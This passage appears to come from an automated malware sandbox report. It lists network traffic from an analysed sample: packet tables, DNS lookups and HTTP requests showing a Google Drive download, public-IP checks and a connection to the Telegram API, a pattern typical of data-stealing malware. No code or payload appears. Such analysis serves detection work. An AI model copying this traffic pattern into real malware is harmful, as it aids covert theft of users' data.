Oct 21, 2024 11:16:51.465423107 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465473890 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.465528965 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465578079 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.465656996 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465706110 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.476119041 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.476176023 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.476211071 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.476401091 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.478027105 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.478077888 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.478127956 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.478177071 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.478223085 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.478271008 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.478313923 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.478363991 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.478430033 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.478480101 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.530546904 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.530714035 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.530720949 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.530771971 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.562572002 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.562757015 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.562764883 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.562812090 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.577833891 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.577907085 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.577929974 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.577980995 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581212044 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581259012 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581406116 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581460953 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581501961 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581552982 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581595898 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581645966 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581700087 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581749916 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581792116 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581841946 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.581913948 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.581970930 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.582073927 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.582119942 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.582149982 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.582166910 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.582230091 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.762532949 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:51.767402887 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:51.767486095 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:51.767652988 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:51.772470951 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:52.621938944 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:52.628402948 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:52.633240938 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:52.877963066 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:52.929125071 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:53.127567053 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.127656937 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.127731085 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.129163027 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.129199982 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.756176949 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.756282091 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.759681940 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.759704113 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.760042906 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.765007973 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.811425924 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.902550936 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.902808905 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:53.902894974 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.906968117 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:53.914788961 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:53.919760942 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:54.164432049 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:54.168083906 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.168191910 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.168272972 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.168513060 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.168540955 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.210380077 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.781591892 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.783034086 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.783077955 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.926459074 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.926672935 CEST	443	49740	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:54.926748991 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.927009106 CEST	49740	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:54.929975033 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.931037903 CEST	49741	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.935302973 CEST	80	49738	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:54.935368061 CEST	49738	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.935882092 CEST	80	49741	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:54.935951948 CEST	49741	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.936021090 CEST	49741	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:54.940896988 CEST	80	49741	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:55.789262056 CEST	80	49741	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:55.790520906 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:55.790587902 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:55.790674925 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:55.790899038 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:55.790915012 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:55.835397005 CEST	49741	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:56.416306973 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:56.417880058 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:56.417913914 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:56.563525915 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:56.563770056 CEST	443	49742	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:56.563838005 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:56.564045906 CEST	49742	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:56.567631006 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:56.572613955 CEST	80	49743	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:56.572700024 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:56.572761059 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:56.577565908 CEST	80	49743	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:57.416898966 CEST	80	49743	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:57.417979002 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:57.418028116 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:57.418129921 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:57.418329000 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:57.418345928 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:57.460426092 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.060244083 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:58.061717033 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:58.061736107 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:58.202050924 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:58.202291012 CEST	443	49744	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:58.202352047 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:58.202728033 CEST	49744	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:58.205509901 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.206345081 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.211065054 CEST	80	49743	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:58.211147070 CEST	49743	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.211277962 CEST	80	49745	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:58.211344957 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.211410046 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:58.216325045 CEST	80	49745	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:59.050570011 CEST	80	49745	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:59.051935911 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.051980019 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.052072048 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.052301884 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.052314043 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.101186037 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.705122948 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.706614017 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.706644058 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.851911068 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.852154970 CEST	443	49746	188.114.97.3	192.168.2.4
Oct 21, 2024 11:16:59.852214098 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.852469921 CEST	49746	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:16:59.855315924 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.856280088 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.860747099 CEST	80	49745	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:59.860815048 CEST	49745	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.861471891 CEST	80	49747	193.122.6.168	192.168.2.4
Oct 21, 2024 11:16:59.861536980 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.861597061 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:16:59.866369009 CEST	80	49747	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:00.695373058 CEST	80	49747	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:00.697196960 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:00.697226048 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:00.697282076 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:00.697633028 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:00.697645903 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:00.741689920 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.317749023 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:01.319108963 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:01.319125891 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:01.461807013 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:01.462053061 CEST	443	49748	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:01.462138891 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:01.462481022 CEST	49748	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:01.465449095 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.466432095 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.470691919 CEST	80	49747	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:01.470752954 CEST	49747	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.471267939 CEST	80	49749	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:01.471333027 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.471379995 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:01.476193905 CEST	80	49749	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:02.329632998 CEST	80	49749	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:02.330640078 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:02.330735922 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:02.330837965 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:02.331032991 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:02.331084013 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:02.382273912 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:02.934621096 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:02.936410904 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:02.936474085 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:03.073973894 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:03.074217081 CEST	443	49750	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:03.074282885 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:03.074615955 CEST	49750	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:03.080094099 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:03.080790043 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:03.085256100 CEST	80	49749	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:03.085481882 CEST	49749	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:03.085669041 CEST	80	49751	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:03.085738897 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:03.085829973 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:03.090567112 CEST	80	49751	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:03.932949066 CEST	80	49751	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:03.934200048 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:03.934307098 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:03.934411049 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:03.934648037 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:03.934684992 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:03.976027012 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.555085897 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:04.556760073 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:04.556816101 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:04.695099115 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:04.695314884 CEST	443	49752	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:04.695399046 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:04.695607901 CEST	49752	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:04.698374987 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.699520111 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.703655958 CEST	80	49751	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:04.703720093 CEST	49751	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.704392910 CEST	80	49753	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:04.704464912 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.704526901 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:04.709353924 CEST	80	49753	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:05.548927069 CEST	80	49753	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:05.552181005 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:05.552299976 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:05.552381992 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:05.552615881 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:05.552654982 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:05.601042032 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:06.164706945 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:06.171885967 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:06.171953917 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:06.309060097 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:06.309185982 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 21, 2024 11:17:06.309247017 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:06.335890055 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:17:06.370662928 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:06.376118898 CEST	80	49753	193.122.6.168	192.168.2.4
Oct 21, 2024 11:17:06.376167059 CEST	49753	80	192.168.2.4	193.122.6.168
Oct 21, 2024 11:17:06.378487110 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:06.378523111 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:06.378582954 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:06.378904104 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:06.378910065 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.237725019 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.237879992 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:07.240382910 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:07.240391016 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.240633965 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.242434978 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:07.283406019 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.485275984 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.485347986 CEST	443	49755	149.154.167.220	192.168.2.4
Oct 21, 2024 11:17:07.485399008 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:07.487416029 CEST	49755	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:17:13.392421007 CEST	49741	80	192.168.2.4	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:16:45.194612980 CEST	56438	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:16:45.201920986 CEST	53	56438	1.1.1.1	192.168.2.4
Oct 21, 2024 11:16:46.549120903 CEST	64273	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:16:46.556633949 CEST	53	64273	1.1.1.1	192.168.2.4
Oct 21, 2024 11:16:51.750452042 CEST	56236	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:16:51.759234905 CEST	53	56236	1.1.1.1	192.168.2.4
Oct 21, 2024 11:16:53.118460894 CEST	63845	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:16:53.127077103 CEST	53	63845	1.1.1.1	192.168.2.4
Oct 21, 2024 11:17:06.370573997 CEST	56400	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:17:06.378020048 CEST	53	56400	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2024 11:16:45.194612980 CEST	192.168.2.4	1.1.1.1	0x61d7	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:46.549120903 CEST	192.168.2.4	1.1.1.1	0xdc88	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.750452042 CEST	192.168.2.4	1.1.1.1	0x7300	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:53.118460894 CEST	192.168.2.4	1.1.1.1	0x28c7	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:17:06.370573997 CEST	192.168.2.4	1.1.1.1	0xcde9	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 21, 2024 11:16:45.201920986 CEST	1.1.1.1	192.168.2.4	0x61d7	No error (0)	drive.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:46.556633949 CEST	1.1.1.1	192.168.2.4	0xdc88	No error (0)	drive.usercontent.google.com		142.250.186.33	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:51.759234905 CEST	1.1.1.1	192.168.2.4	0x7300	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:53.127077103 CEST	1.1.1.1	192.168.2.4	0x28c7	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:16:53.127077103 CEST	1.1.1.1	192.168.2.4	0x28c7	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:17:06.378020048 CEST	1.1.1.1	192.168.2.4	0xcde9	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:16:51.767652988 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:16:52.621938944 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9bc00e6c85eb7fc2c8c5790ee4a28506 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:16:52.628402948 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
